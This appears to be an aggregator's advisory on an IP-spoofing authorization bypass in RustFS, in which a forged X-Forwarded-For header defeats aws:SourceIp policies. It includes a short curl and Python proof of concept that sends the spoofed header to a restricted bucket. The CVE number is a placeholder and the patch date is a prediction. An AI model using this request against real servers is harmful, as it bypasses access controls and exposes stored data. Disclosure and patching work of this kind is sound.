RustFS, IP Spoofing Authorization Bypass, CVE-2024-XXXXX (Critical)

Listen to this Post

The vulnerability exists in the `get_condition_values` function within rustfs/src/auth.rs. This function is responsible for determining the client’s IP address for use in evaluating IAM and bucket policy conditions, specifically the `aws:SourceIp` key. The code naively extracts the IP address from the HTTP request headers `X-Forwarded-For` or `X-Real-Ip` without any validation that the request passed through a trusted proxy. An attacker can directly connect to the RustFS server and supply a forged `X-Forwarded-For` header containing an IP address that matches an allowlist policy. This spoofed value is then passed via `get_source_ip_raw` and inserted into the authorization arguments. Consequently, the policy evaluation engine in `rustfs/src/storage/access.rs` is tricked into believing the request originates from a permitted IP address, leading to a complete bypass of IP-based access controls.
Platform: RustFS
Version: Pre-1.0
Vulnerability: IP Spoofing Bypass
Severity: Critical
date: 2024-11-04

Prediction: Patch expected 2024-11-18

What Undercode Say:

Locate vulnerable auth logic
grep -n "X-Forwarded-For|X-Real-Ip" rustfs/src/auth.rs
Check policy evaluation path
find . -name ".rs" -exec grep -l "aws:SourceIp|SourceIp" {} \;
Build and run test instance
cargo build --bin rustfs
RUSTFS_ACCESS_KEY=test RUSTFS_SECRET_KEY=test cargo run -- 0.0.0.0:9000 ./data

How Exploit:

curl -H "X-Forwarded-For: 10.0.0.5" http://target:9000/bucket
PoC script outline
import requests
headers = {'X-Forwarded-For': 'ALLOWED_IP'}
req = requests.get('http://rustfs:9000/restricted_bucket', headers=headers)

Protection from this CVE

1. Validate proxy headers.

2. Use trusted proxy list.

3. Implement authentication.

Impact:

Authorization bypass.

Policy enforcement failure.

Data access compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top